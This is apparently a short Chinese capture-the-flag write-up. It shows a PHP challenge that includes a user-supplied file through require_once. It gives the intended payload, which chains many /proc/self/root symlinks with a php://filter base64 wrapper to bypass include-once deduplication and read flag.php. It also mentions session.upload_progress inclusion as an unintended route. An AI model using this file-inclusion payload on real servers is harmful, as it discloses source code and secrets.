開局幾行字:
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}
參考:https://blog.csdn.net/weixin_48537150/article/details/113189052
PHP最新版的小Trick, require_once包含的軟鏈接層數較多時once的hash匹配會直接失效造成重復包含
payload:?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
上面的是預期解。
非預期解是利用session.upload_progress進行文件包含。
不再贅述。
over.